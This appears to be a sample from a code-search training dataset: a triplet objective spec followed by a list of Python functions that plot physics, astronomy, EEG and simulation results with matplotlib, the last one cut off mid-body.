ax2.set_ylim(y.min(), y.max())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def momentum_kde2_paperplot(fields):\n plt.figure(figsize=(2.65, 2.5))\n ax = plt.axes([0.18, 0.17, 0.8, 0.8])\n colorList = [med_color, high_color]\n lw = 1.5\n i = 0\n meankx_2 = []\n meankx_3 = []\n k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + \"E_{:.1e}.npy\".format(fields[0]))\n # ax.plot(k_ax, np.zeros(len(k_ax)), '-', linewidth=lw, color=eq_color, label='Equilibrium')\n # ax.plot(k_ax, np.zeros(len(k_ax)), '-', linewidth=lw, color=eq_color)\n ax.axhline(0, color='black', linestyle='--', linewidth=0.5)\n # ax.axvline(0, color='gray', linewidth=0.8, alpha=0.5)\n for ee in fields:\n ee_Vcm = ee/100\n k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_f0_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_f0_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n kdist_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '3_' + \"E_{:.1e}.npy\".format(ee))\n\n chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n meankx_2.append(utilities.mean_kx(chi_2_i, electron_df))\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n meankx_3.append(utilities.mean_kx(chi_3_i, electron_df))\n\n ax.plot(k_ax, kdist_2, '--', linewidth=lw, color=colorList[i], label='Cold '+r'{:.0f} '.format(ee/100)+r'$\\rm V cm^{-1}$')\n ax.plot(k_ax, kdist_3, '-', linewidth=lw,color=colorList[i], label='Warm '+r'{:.0f} '.format(ee/100)+r'$\\rm V cm^{-1}$')\n i = i + 1\n # ax.plot(k_ax, kdist_f0_3, '--', linewidth=lw, color='black', label=r'$f_0$')\n # ax.plot(meankx_2,np.mean(abs(kdist_2))*np.ones(len(meankx_3)), '-', linewidth=lw, color='black')\n # ax.plot(meankx_3,np.mean(abs(kdist_3))*np.ones(len(meankx_3)), '-', linewidth=lw, color='black')\n\n ax.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))\n ax.locator_params(axis='y', nbins=6)\n ax.locator_params(axis='x', nbins=6)\n # ax.tick_params(direction='in')\n ax.set_xlim(-0.085, 0.081)\n\n plt.xlabel(r'$\\rm k_x \\, \\, (\\AA^{-1})$')\n plt.ylabel(r'Deviational occupation $\\rm \\Delta f_{\\mathbf{k}}$')\n # plt.grid(lw=0.8, linestyle='dotted')\n # plt.ylabel(r'$\\delta f_{\\mathbf{k}}/f_{\\mathbf{k}}^0$')\n # plt.ylim([-1,1])\n plt.legend(frameon=False,prop={'size':different_small_size})\n plt.savefig(pp.figureLoc+'momentum_KDE2.png', dpi=600)", "def plot_energies(self):\n plt.plot(self.energies[0], self.energies[1])\n plt.xlabel('Time (s)')\n plt.ylabel('Energy (J)')\n plt.show()", "def momentum_kde_paperplot(fields):\n fig, (ax1, ax2, ax3) = plt.subplots(nrows=3, sharex=True)\n axisList = [ax1,ax2,ax3]\n i =0\n\n props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n for ee in fields:\n ee_Vcm = ee/100\n textstr = r'$E_{k_x}\\, = \\, %.1f \\, V \\, cm^{-1}$' % ee_Vcm\n k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_f0_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '2_' + \"E_{:.1e}.npy\".format(ee))\n\n kdist_f0_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n kdist_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '3_' + \"E_{:.1e}.npy\".format(ee))\n axisList[i].fill(k_ax, 
kdist_2/np.max(kdist_f0_2), '--', linewidth=1, alpha=0.6, label='Cold '+r'$e^{-}$ '+r'$\\Delta f$',color='blue')\n axisList[i].fill(k_ax, kdist_3/np.max(kdist_f0_2), '--', linewidth=1, alpha=0.6, label='Warm '+r'$e^{-}$ '+r'$\\Delta f$',color='red')\n axisList[i].plot(k_ax, kdist_2/np.max(kdist_f0_2), '-', linewidth=1,color='blue')\n axisList[i].plot(k_ax, kdist_3/np.max(kdist_f0_2), '-', linewidth=1,color='red')\n axisList[i].plot(k_ax, kdist_f0_2/np.max(kdist_f0_2), '-', linewidth=1, label='Equilibrium Dist.',color='black')\n axisList[i].yaxis.set_major_formatter(FormatStrFormatter('%g'))\n axisList[i].locator_params(axis='y', nbins=3)\n axisList[i].locator_params(axis='x', nbins=5)\n axisList[i].set_xlim(-0.06,0.06)\n axisList[i].text(0.02, 0.92, textstr, transform=axisList[i].transAxes, verticalalignment='top', bbox=props)\n\n i = i+1\n plt.xlabel(r'$k_x \\, \\, (\\AA^{-1})$')\n ax2.set_ylabel('Occupation Probability (norm.)')\n axisList[0].legend(loc=\"upper right\")\n plt.savefig(pp.figureLoc+'momentum_KDE.png', bbox_inches='tight',dpi=600)", "def exposure_plots(self, energy=1000.):\n cfg = configuration.Configuration(os.path.expandvars('.'), quiet=True);\n exp = cfg.irfs.exposure(0, energy) \n hf = hpm.HPskyfun('front-1000 exp', exp, 64);\n expf = hf.getcol()\n emeanf = expf.mean()\n euw=hpm.HParray('FRONT exposure @ {} MeV / {:.2e}'.format(energy, emeanf), expf/emeanf)\n fig,ax=plt.subplots(figsize=(12,6))\n euw.plot(axes=ax,vmin=0.80,vmax=1.20, title=euw.name, \n cmap=plt.get_cmap('coolwarm')).grid(color='grey');\n\n return fig", "def plot_dereddening():\n extinction_coefficients = {'2365-2764-1': np.array([0.2622, 0.844]), '4109-638-1': np.array([0.0524, 0.1576]),\n '2058-56-1': np.array([0.0751, 0.248]), '3642-2459-1': np.array([0.1907, 0.608]),\n '3999-1391-1': np.array([0.3911, 1.2480]), '2607-1448-1': np.array([0.0430, 0.1310])}\n cepheids = {'2365-2764-1': np.array([0.959, 2.09]), '4109-638-1': np.array([0.705, 2.385]), '2058-56-1':\n np.array([1.222, 1.333]), '3642-2459-1': np.array([1.088, 2.0518]), '3999-1391-1':\n np.array([1.360, 1.2567]), '2607-1448-1': np.array([1.484, 0.6963])}\n periods = {'2365-2764-1': 1.61, '4109-638-1': 15.31, '2058-56-1': 63.08, '3642-2459-1': 1.86, '3999-1391-1': 24.98,\n '2607-1448-1': 8.54}\n max_periods = max(periods.values())\n\n new_positions_bv_mv = [] # in M_V vs B-V space\n colors = []\n theoretical_position = []\n for obj in extinction_coefficients.keys():\n # new_positions_bv_mv.append(cepheids[obj]-extinction_coefficients[obj])\n new_positions_bv_mv.append(cepheids[obj])\n colors.append(periods[obj]/max_periods)\n theoretical_position.append(-2.78*np.log10(periods[obj])-1.35)\n\n for pos in range(len(new_positions_bv_mv)):\n plt.scatter(new_positions_bv_mv[pos][0], new_positions_bv_mv[pos][1], marker='^', facecolor='w', s=40)\n plt.scatter(new_positions_bv_mv[pos][0], theoretical_position[pos], marker='o', facecolor='r', s=50)\n return new_positions_bv_mv, colors", "def energies():\n # Hardcoded initial values\n numsteps = 10000\n time_max = 1\n # Running the calculation in the solver class using the velocity verlet method\n # for better accuracy.\n verlet = solver(input_matrix, 'verlet', time_max, numsteps)\n output_matrix, KE, PE, AM = verlet.main()\n # Creating a simple time axis for plotting\n x = np.linspace(0, 1, numsteps+1)\n\n # Plotting kinetic energy over time\n plt.figure(1, figsize=(10, 10))\n plt.plot(x, KE)\n plt.suptitle('Total kinetic energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', 
fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['KE'])\n\n # Plotting potential energy over time\n plt.figure(2, figsize=(10, 10))\n plt.plot(x, PE)\n plt.suptitle('Total potential energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['PE'])\n\n # Plotting total energy against time\n plt.figure(3, figsize=(10, 10))\n plt.plot(x, PE+KE)\n plt.suptitle('Total energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['KE+PE'])\n\n # Plotting angular momentum against time. print the amplitude to terminal\n amplitude = max(AM)-min(AM)\n print('Amplitude of angular momentum during 1 year: %g[AU²/yr²]' %(amplitude))\n plt.figure(4, figsize=(10, 10))\n plt.plot(x, AM)\n plt.suptitle('Total angular momentum in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²/yr²]', fontsize=16)\n plt.legend(['AM'])\n\n # Plotting the kinetic, potential and total energy against time to see\n # how great the variations are\n plt.figure(5, figsize=(10, 10))\n plt.plot(x, PE, x, KE, x, KE+PE)\n plt.suptitle('Total energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['PE', 'KE', 'KE+PE'])\n plt.show()", "def plot_kde():\n f, (ax1, ax2) = plt.subplots(1, 2, sharey=True, sharex=True)\n sns.kdeplot(data.data.numpy()[:,0], data.data.numpy()[:,1], color=\"r\", shade=True, ax=ax1)\n sns.kdeplot(dec_mean.data.numpy()[:,0], dec_mean.data.numpy()[:,1], color=\"b\", shade=True, ax=ax2)\n plt.show()\n plt.pause(1e-6)\n plt.gcf().clear()", "def plot_energy(self, color=['r','g','b','c','m','y','k'], mod = 'E0'):\n if not mpl: raise \"Problem with matplotib: Plotting not possible.\"\n f = plt.figure(figsize=(5,4), dpi=100)\n a = f.add_subplot(111)\n strainList= self.__structures.items()[0][1].strainList\n \n if len(strainList)<=5:\n kk=1\n ll=len(strainList)\n grid=[ll]\n elif len(strainList)%5 == 0:\n kk=len(strainList)/5\n ll=5\n grid=[5 for i in range(kk)]\n else:\n kk=len(strainList)/5+1\n ll=5\n grid=[5 for i in range(kk)]\n grid[-1]=len(strainList)%5\n \n \n n=1\n m=1\n j=0\n for stype in strainList:\n \n spl = '1'+str(len(strainList))+str(n)\n if (n-1)%5==0: m=0\n a = plt.subplot2grid((kk,ll), ((n-1)/5,m), colspan=1)\n \n \n \n fi=open(stype+'.energy','w')\n \n #self.search_for_failed()\n atoms = self.get_atomsByStraintype(stype)\n if self.__thermodyn and mod=='F':\n energy = [i.gsenergy+i.phenergy[100] for i in atoms]\n elif self.__thermodyn and mod=='E0':\n energy = [i.gsenergy for i in atoms]\n elif self.__thermodyn and mod=='Fvib':\n energy = [i.phenergy[100] for i in atoms]\n else:\n energy = [i.gsenergy for i in atoms]\n strain = [i.eta for i in atoms]\n \n ii=0\n for (e,s) in zip(energy,strain):\n if e==0.: \n energy.pop(ii); strain.pop(ii)\n ii-=1\n ii+=1\n #print stype, energy, [i.scale for i in atoms]\n plt.plot(strain, energy, '%s*'%color[j%7])\n \n k=0\n for st in strain:\n fi.write('%s %s \\n'%(st,energy[k]))\n k+=1\n fi.close()\n \n poly = np.poly1d(np.polyfit(strain,energy,self.__fitorder[j]))\n xp = np.linspace(min(strain), max(strain), 100)\n a.plot(xp, poly(xp),color[j%7],label=stype)\n \n a.set_title(stype)\n \n j+=1\n \n n+=1\n m+=1\n \n a.set_xlabel('strain')\n a.set_ylabel(r'energy in eV')\n #a.legend(title='Strain type:')\n \n return f", "def 
plot(self, num_levels=10):\n if num_levels == -1:\n num_levels = len(self.energies())\n print(self.energies(num_levels))\n figure(figsize=(20, 5))\n subplot(1, num_levels + 1, 1)\n self.plot_potential()\n #xlabel('$\\phi$')\n for ii, psi2D in enumerate(self.get_2Dpsis(num_levels)):\n subplot(1, num_levels + 1, ii + 2)\n #imshow(psi2D.real,extent=(self.x[0],self.x[-1],self.y[0],self.y[-1]),interpolation=\"None\",aspect='auto')\n imshow(psi2D.real, interpolation=\"None\", aspect='auto')\n xlabel(ii)", "def plot_energies(self, np = None, ax=None):\n if not ax:\n import matplotlib.pyplot as plt\n fig = plt.figure()\n ax = fig.add_subplot(111)\n else:\n fig = None\n if np:\n datas = self.results['energies'][np[0]:np[1]]\n else:\n datas = self.results['energies']\n ax.plot(range(len(datas)), datas, '-o')\n # ax.set_ylim([self.results['energies'][-1], self.results['energies'][0]])\n ax.set_xlabel('steps')\n ax.set_ylabel('energy [eV]')\n ax.set_title('Energy profile {0}'.format(self.prefix))\n plt.savefig('{0}.png'.format(self.prefix))", "def plotEnergiesOpt(monthlyData, optIdx):\n \n \n dummyRange = np.asarray(range(len(optIdx)))\n \n fig = plt.figure(figsize=(16, 8))\n \n plt.suptitle('Energy Comparison')\n ax1 = plt.subplot(1,1,1)\n plt.plot(monthlyData['H'][optIdx, dummyRange], label = 'H', color='r')\n plt.plot(monthlyData['C'][optIdx, dummyRange], label = 'C', color='b')\n plt.plot(monthlyData['L'][optIdx, dummyRange], label = 'L', color='g')\n plt.plot(monthlyData['PV'][optIdx, dummyRange], label = 'PV', color='c')\n plt.plot(monthlyData['E_HCL'][optIdx, dummyRange], label = 'HCL', color='m')\n plt.plot(monthlyData['E_tot'][optIdx, dummyRange], label = 'E_tot', color='k')\n plt.ylabel('Energy [kWh]')\n plt.xlim(0,288)\n\n# plt.legend()\n \n majorLocator = MultipleLocator(24)\n majorFormatter = FormatStrFormatter('%d')\n minorLocator = MultipleLocator(4)\n minorFormatter = FormatStrFormatter('%d')\n\n ax1.xaxis.set_major_locator(majorLocator)\n ax1.xaxis.set_major_formatter(majorFormatter)\n ax1.xaxis.set_minor_locator(minorLocator)\n# ax1.xaxis.set_minor_formatter(minorFormatter)\n plt.grid(True, which=u'major')\n \n # Shrink current axis by 20%\n box = ax1.get_position()\n ax1.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n \n # Put a legend to the right of the current axis\n ax1.legend(loc='upper left', bbox_to_anchor=(1, 1.05))\n# \n\n plt.xticks(range(0,288,24),('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'))\n# ax2 = plt.subplot(2,1,2, sharex=ax1)\n# plt.plot(multiplier*monthlyData[energyType][indices['H'], dummyRange]-multiplier*monthlyData[energyType][indices[energyType], dummyRange], label = 'optimized for H', color='r')\n# plt.plot(multiplier*monthlyData[energyType][indices['C'], dummyRange]-multiplier*monthlyData[energyType][indices[energyType], dummyRange], label = 'optimized for C', color='b')\n# plt.plot(multiplier*monthlyData[energyType][indices['L'], dummyRange]-multiplier*monthlyData[energyType][indices[energyType], dummyRange], label = 'optimized for L', color='g')\n# plt.plot(multiplier*monthlyData[energyType][indices['PV'], dummyRange]-multiplier*monthlyData[energyType][indices[energyType], dummyRange], label = 'optimized for PV', color='c')\n# plt.plot(multiplier*monthlyData[energyType][indices['E_HCL'], dummyRange]-multiplier*monthlyData[energyType][indices[energyType], dummyRange], label = 'optimized for HCL', color='m')\n# plt.plot(multiplier*monthlyData[energyType][indices['E_tot'], 
dummyRange]-multiplier*monthlyData[energyType][indices[energyType], dummyRange], label = 'optimized for E_tot', color='k')\n# plt.plot(multiplier*monthlyData[energyType][indices['45'],:]-multiplier*monthlyData[energyType][indices[energyType], dummyRange], label = 'fixed at 45 deg', color='y')\n# plt.ylabel('Energy Difference [kWh]')\n# plt.legend()\n#\n# ax2.xaxis.set_major_locator(majorLocator)\n# ax2.xaxis.set_major_formatter(majorFormatter)\n# ax2.xaxis.set_minor_locator(minorLocator)\n## ax2.xaxis.set_minor_formatter(minorFormatter)\n# plt.grid(True, which='both')\n# \n return fig", "def plot_dimer_energy(self, axis=None):\n x_scan = np.linspace(0.5, 2.5, 100)\n E_scan = self.dimer_energy(\n np.array([-0.5 * x_scan, np.zeros(100), 0.5 * x_scan, np.zeros(100)]).T\n )\n E_scan -= E_scan.min()\n\n import matplotlib.pyplot as plt\n\n if axis is None:\n axis = plt.gca()\n # plt.figure(figsize=(5, 4))\n axis.plot(x_scan, E_scan, linewidth=2)\n axis.set_xlabel(\"x / a.u.\")\n axis.set_ylabel(\"Energy / kT\")\n axis.set_ylim(E_scan.min() - 2.0, E_scan[int(E_scan.size / 2)] + 2.0)\n\n return x_scan, E_scan", "def mc_energyplot(energy_array):\n \n\n plt.plot(energy_array, \"r-\", label=\"energy\")\n\n plt.xlabel(\"No. of steps\")\n plt.ylabel(\"Total Energy (kJ/mol)\")\n \n plt.title(\"Total energy vs steps\")\n plt.legend(loc=1, fontsize= 'x-large')\n plt.show()", "def plotERP(self, ep):\n import os \n import matplotlib.pyplot as plt\n \n try:\n filename = ep.filename.split('\\\\')[-1].split('.fif')[0]\n filename = 'plotsEEG_'+filename.split('_')[0] \n except Exception as err: \n filename = 'plots_eeg_file' \n print(err) \n finally:\n print('Saving ERP plots at >>>>', os.getcwd())\n \n try:\n os.mkdir(os.path.join(os.getcwd(), filename)) \n os.chdir(os.path.join(os.getcwd(), filename)) \n except Exception as err:\n print(err) \n \n \n ep = ep.interpolate_bads(reset_bads='True', mode = 'accurate')\n ep.info['bads'] = []\n \n ep.plot_psd(area_mode='range',fmin=0, fmax=40, tmax=10.0).savefig(filename + '_psd')\n\n# picks = ['FC2', 'C4', 'Cz', 'C5', 'FC1'] \n \n ep.plot_image(picks = None, cmap='interactive', sigma=1) \n \n plt.savefig(filename + '_image') \n \n bands = [(0, 4, 'Delta'), (4, 8, 'Theta'), (8, 12, 'Alpha'),\n (12, 30, 'Beta'), (30, 45, 'Gamma')] \n \n ep.plot_psd_topomap(bands=bands, vmin=None, vmax=None, \n tmin=0, tmax=0.5).savefig(filename + '_psd_topo')\n \n ep.plot_sensors().savefig(filename + '_sensors_') \n \n ep.plot_topo_image(vmin=-25, vmax=25, title='ERF images', sigma=3.,\n fig_facecolor='w', font_color='k').savefig(filename + '_image_topo') \n \n ep.average().plot().savefig(filename + 'erp_average_')\n ep.average().plot_image().savefig(filename + '_erp_average_image')\n print('Saving ERP plots at >>>>', os.getcwd())", "def plot_e_field(ax, data, timestep, label): \r\n ax.set_zlim(-0.5, 1) \r\n ax.view_init(elev=15., azim=25) \r\n ax.plot_surface(Y, X, data, rstride=1, cstride=1, color='red', edgecolor='yellow', linewidth=.25)\r\n ax.zaxis.set_rotate_label(False) \r\n ax.set_zlabel(r' $E_{Z}$', rotation=90, labelpad=10, fontsize=14) \r\n ax.set_zticks([-0.5, 0, 0.5, 1]) \r\n ax.set_xlabel('Position(cm)') \r\n ax.set_ylabel('Position(cm)') \r\n ax.set_xticks(np.arange(0, 50, step=20)) \r\n ax.set_yticks(np.arange(0, 50, step=20)) \r\n ax.text2D(0.6, 0.7, \"T = {}\".format(timestep), transform=ax.transAxes) \r\n ax.xaxis.pane.fill = ax.yaxis.pane.fill = ax.zaxis.pane.fill = False \r\n plt.gca().patch.set_facecolor('white') \r\n ax.text2D(-0.05, 0.8, \"({})\".format(label), 
transform=ax. transAxes) \r\n ax.dist = 11\r\n # Plot the E field at each of the four time steps saved earlier\r", "def plotDihedralEnergy(self, phys, forces, step): \r\n self.plotQuantity(step, phys.app.energies.getTable(4), 'dihedralenergy')", "def plot_Emax(xs, **kw):\n\n #get plotting objects\n fig, ax = _prepare_fig(**kw)\n #get plotting specs\n xmax = _find_xmax(xs)\n #init handles and labels lists for legend\n kw['H'], kw['L'] = [], []\n #plot the field curve\n x = xs.fields['Emax'][-xmax:xmax].index.values\n y = xs.fields['Emax'][-xmax:xmax].values\n kw['H'].append(ax.plot(x, y, color=_E_color, linewidth=_fields_linewidth)[0])\n kw['L'].append(r'Electric Field (kV/m)')\n #plot wires\n _plot_wires(ax, xs.hot, xs.gnd, xs.fields['Emax'], **kw)\n _check_und_conds([xs], [ax], **kw)\n #plot ROW lines\n _plot_ROW_edges(ax, xs.lROW, xs.rROW, **kw)\n #set axis text and legend\n ax.set_xlabel(r'Distance (ft)')\n ax.set_ylabel(r'Maximum Electric Field (kV/m)')\n ax.set_title(textwrap.fill('Maximum Electric Field - %s' % xs.title))\n ax.legend(kw['H'], kw['L'], **_leg_kw)\n _format_line_axes_legends(ax)\n #save the fig or don't, depending on keywords\n _save_fig(xs.sheet, fig, **kw)\n #return\n return(fig, ax)", "def display_energy_levels_0d(diagram, num_atoms, atoms, h_poly):\n h = eval_hamiltonian(num_atoms, h_poly, (1, 1))\n\n e, v = eigensystem(h)\n\n left = 0\n bottom = 0\n right = max([len(row) for row in diagram.split('\\n')])\n top = len(diagram.split('\\n'))\n\n plot_rows = numpy.ceil(math.sqrt(num_atoms+1))\n plot_cols = plot_rows\n\n for i in range(num_atoms):\n matplotlib.pyplot.subplot(plot_rows, plot_cols, i+1, axisbg=\"#000000\")\n y = [atom[0] for atom in atoms]\n x = [atom[1] for atom in atoms]\n c = numpy.abs(v[i]*v[i])\n\n matplotlib.pyplot.title('E = %f' % numpy.real(e[i]), fontsize = 10)\n norm = matplotlib.colors.Normalize(vmin = min(c),\n vmax = max(0.0001, max(c)))\n #x = [0,0,1,1]\n #y = [0,1,0,1]\n #c = [1,2,3,4]\n matplotlib.pyplot.hexbin(x, y, C = c,\n gridsize = (right-left, top-bottom),\n extent = (left, right, bottom, top),\n cmap = matplotlib.pyplot.get_cmap(\"gray\"),\n norm = norm\n )\n\n matplotlib.pyplot.subplot(plot_rows, plot_cols, num_atoms+1)\n matplotlib.pyplot.scatter(num_atoms*[0], e, s = 0.1)", "def plot_energy_dependence(self, ax=None, offset=None, energy=None, **kwargs):\n import matplotlib.pyplot as plt\n\n ax = plt.gca() if ax is None else ax\n\n if offset is None:\n offset = Angle(np.linspace(0.5, 2, 4), 'deg')\n\n if energy is None:\n energy = self.energy\n\n for off in offset:\n area = self.evaluate(off, energy)\n label = 'offset = {:.1f}'.format(off)\n ax.plot(energy, area.value, label=label, **kwargs)\n\n ax.loglog()\n ax.set_ylim(1e2, 1e7)\n ax.set_xlabel('Energy ({0})'.format(self.energy.unit))\n ax.set_ylabel('Effective Area ({0})'.format(self.eff_area.unit))\n ax.legend(loc='lower right')\n\n return ax", "def plot_field_uncertainties():\n\n resize_size = (1000, 1000)\n\n\n dirs = [os.path.join(path_to_here, '../data/landscape_visualizations/{}/{}/'.format(drug_name, j)) for j in ['original', 'repeat_a', 'repeat_b']]\n if drug_name == 'DMSO':\n dirs = [os.path.join(path_to_here, '../data/landscape_visualizations/{}/{}/30_hours/'.format(drug_name, j)) for j in ['original', 'repeat_a', 'repeat_b']]\n\n def transform(x):\n if type(x) is np.ndarray:\n x = change_array_lims(x)\n x = np.log(x)\n return x\n\n F_unc_vmin = -7\n F_unc_vmax = -4\n sigma_vmin = -5\n sigma_vmax = 0 #0.4\n sigma_unc_vmin = -6\n sigma_unc_vmax = -2\n\n fig_Fs = 
[plt.figure() for _ in range(3)]\n fig_uncertainty = plt.figure()\n sigma_lists, F_arrays = [], []\n for idx_fig, dir in enumerate(dirs):\n\n p_list = _load_and_resize_list(dir+'p_list_0.pickle')\n D_list = _load_and_resize_list(dir+'D_list_0.pickle')\n U_array = pickle.load(open(dir+'U.pickle', 'rb'))\n U_array = cv2.resize(U_array, resize_size, interpolation = cv2.INTER_LINEAR)\n Gx, Gy = np.gradient(U_array, 26./resize_size[0], 26./resize_size[0]) # gradients with respect to x and y\n F_array = (Gx**2+Gy**2)**.5 # gradient magnitude\n F_array[np.isinf(F_array)] = np.nan\n F_array[p_list[-1]<1e-3]=np.nan # final PDF\n sigma_list = []\n for j in range(9):\n arr = D_list[2*j] # current PDF\n arr[p_list[j]<1e-3]=np.nan\n sigma_list.append(np.sqrt(2*arr))\n\n\n sigma_lists.append(sigma_list)\n F_arrays.append(F_array)\n\n ax = fig_Fs[idx_fig].add_subplot(111)\n ax.imshow(transform(F_array)[::-1, :], cmap = cmap, vmin = -4.6, vmax = -2)\n ax.set_title(dir)\n\n all_axes = [i for j in fig_Fs for i in j.axes]\n for ax in all_axes:\n ax.axis('off')\n\n # uncertainties\n\n std = np.std(F_arrays, axis = 0)\n ax = fig_uncertainty.add_subplot(121)\n ax.imshow(transform(std)[::-1, :], cmap = cmap, vmin = F_unc_vmin, vmax = F_unc_vmax)\n ax.set_title('F_uncertainty')\n\n fig_sigma = plt.figure()\n ax = fig_sigma.add_subplot(111)\n ax.imshow(transform(np.nanmean(sigma_lists[0], axis = 0))[::-1, :], cmap = cmap, vmin = sigma_vmin, vmax = sigma_vmax) # index 0 (i.e. 'original') corresponds to the landscapes in other figures\n ax.set_title('sigma_mean')\n\n sigma_means = [np.nanmean(sigma_list, axis = 0) for sigma_list in sigma_lists]\n std_array = np.nanstd(sigma_means, axis = 0)\n ax = fig_uncertainty.add_subplot(122)\n ax.imshow(transform(std_array)[::-1, :], cmap = cmap, vmin = sigma_unc_vmin, vmax = sigma_unc_vmax)\n ax.set_title('sigma_uncertainty')\n\n fig_sigma.savefig(path_to_here+'/../outputs/{}_mean_sigma.png'.format(drug_name), dpi = 1200)\n fig_uncertainty.savefig(path_to_here+'/../outputs/{}_uncertainties.png'.format(drug_name), dpi = 1200)", "def plot_vanHove_dt(comp,conn,start,step_size,steps):\n \n (fin,) = conn.execute(\"select fout from comps where comp_key = ?\",comp).fetchone()\n (max_step,) = conn.execute(\"select max_step from vanHove_prams where comp_key = ?\",comp).fetchone()\n Fin = h5py.File(fin,'r')\n g = Fin[fd('vanHove',comp[0])]\n\n temp = g.attrs['temperature']\n dtime = g.attrs['dtime']\n\n\n # istatus = plots.non_i_plot_start()\n \n fig = mplt.figure()\n fig.suptitle(r'van Hove dist temp: %.2f dtime: %d'% (temp,dtime))\n dims = figure_out_grid(steps)\n \n plt_count = 1\n outs = []\n tmps = []\n for j in range(start,start+step_size*steps, step_size):\n (edges,count,x_lim) = _extract_vanHove(g,j+1,1,5)\n if len(count) < 50:\n plt_count += 1\n continue\n #count = count/np.sum(count)\n \n sp_arg = dims +(plt_count,)\n ax = fig.add_subplot(*sp_arg)\n ax.grid(True)\n\n \n alpha = _alpha2(edges,count)\n \n ax.set_ylabel(r'$\log{P(N)}$')\n ax.step(edges,np.log((count/np.sum(count))),lw=2)\n ax.set_title(r'$\alpha_2 = %.2f$'%alpha + ' j:%d '%j )\n ax.set_xlim(x_lim)\n plt_count += 1\n\n mplt.draw()\n\n # plots.non_i_plot_start(istatus)\n\n del g\n Fin.close()\n del Fin", "def simulation_energy_over_time(E, T_ns, T_ns_threshold):\n no_start = (T_ns > T_ns_threshold)\n # (x, y, labels_dict, file_title, plot_title)\n generate_2D_plot(T_ns[no_start], E[no_start],\n {'x': r'time [$ns$]',\n 'y': r'E [$kcal/mol/A^2$]'},\n \"energy_graph\",\n \"Energy(time) graph\")", "def 
plotMEC(dimensions = 2, J = 1, filename = None,N = [20], \\\r\n anneal = True, Tlim = [1,4], prelims = 50, sweeps = 200, \\\r\n plots = True, plainlines = False, steps = 150):\r\n \r\n #temperature linespace\r\n T = np.linspace(Tlim[0],Tlim[1], steps)\r\n \r\n #tabulated magnetisation arry list\r\n Ms = []\r\n \r\n #tabulated energy array list\r\n Es = []\r\n \r\n #tabulated heat capacities\r\n Cs = []\r\n \r\n #labels used for datasets in the plots\r\n labels = []\r\n \r\n #critical exponent function used to fit data.\r\n def f (x, p1, p2, p3) : return p1*(((p2-x)/p2) ** p3)\r\n \r\n \r\n \r\n #itterate over wanted values of N\r\n for k in range(len(N)):\r\n \r\n #magnetisations and energies for N(i)\r\n M = np.zeros(T.shape)\r\n E = np.zeros(T.shape)\r\n C = np.zeros(T.shape)\r\n \r\n #lattice for N(i)\r\n lattice = initialiser(N[k],dimensions = dimensions)\r\n\r\n\r\n \r\n #itterate over all temperatures, highest first\r\n for i in range(len(T)):\r\n #highest first\r\n index = len(T) - i - 1\r\n \r\n #run simulation\r\n (Mi,Ei,l) = simulation(N[k],T[index],sweeps, lattice,\\\r\n dimensions = dimensions, J = J, prelims = prelims)\r\n \r\n #tabulate obtained data\r\n M[index] = np.abs(np.mean(Mi))\r\n E[index] = np.mean(Ei)\r\n Ci = (np.std(Ei)/T[index] * N[k] /2)**2\r\n C[index] = np.mean(Ci)\r\n \r\n #change lattice that will be fed to the next simulation\r\n if anneal:\r\n lattice = l \r\n \r\n #tabulate data for N(i)\r\n Ms.append(M)\r\n Es.append(E)\r\n Cs.append(C)\r\n \r\n labels.append(\"N = \"+str(N[k]))\r\n \r\n if plots:\r\n orderpar = \"Magnetisation\" if J>0 else \"Staggered Magnetisation\"\r\n \r\n #plot data\r\n magfigure = makeplot(T,Ms, labels, \"Temperature / $[J/k_B]$\", orderpar,\\\r\n plainlines=plainlines)\r\n \r\n magfigure.show()\r\n \r\n enfigure = makeplot(T,Es, labels, \"Temperature / $[J/k_B]$\", \"Energy per spin / $[J]$\",\\\r\n plainlines=plainlines)\r\n enfigure.show()\r\n \r\n cfigure = makeplot(T, Cs, labels, \"Temperature / $[J/k_B]$\", \"Heat Capacity / $[k_B]$\",\\\r\n plainlines=plainlines)\r\n 